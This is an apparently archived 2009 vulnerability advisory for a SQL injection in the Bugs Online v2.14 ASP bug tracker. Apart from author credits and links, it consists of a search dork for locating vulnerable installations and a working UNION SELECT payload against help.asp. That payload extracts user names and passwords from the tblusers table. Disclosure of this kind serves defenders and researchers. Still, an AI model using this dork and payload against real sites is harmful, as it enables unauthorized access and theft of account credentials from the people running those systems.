Bugs Online v2.14 Sql Injection

2009-01-31T00:00:00
ID SECURITYVULNS:DOC:21259
Type securityvulns
Reporter Securityvulns
Modified 2009-01-31T00:00:00

Description

Bugs Online v2.14 Sql Injection

AUTHOR : Sina Yazdanmehr (R3d.W0rm)

Discovered by : Sina Yazdanmehr (R3d.W0rm)

Our Site : http://ircrash.com

My Official WebSite : http://r3dw0rm.ir

IRCRASH Team Members : Khashayar Fereidani - R3d.w0rm (Sina Yazdanmehr)

Download : http://sourceforge.net/project/showfiles.php?group_id=42528

Dork : ext:asp Welcome to bugs online

[Bug]

http://[site]/help.asp?stype=-999'%20union%20select%200,suser_name,spassword%20from%20tblusers%20where%20'1

################################ TNX GOD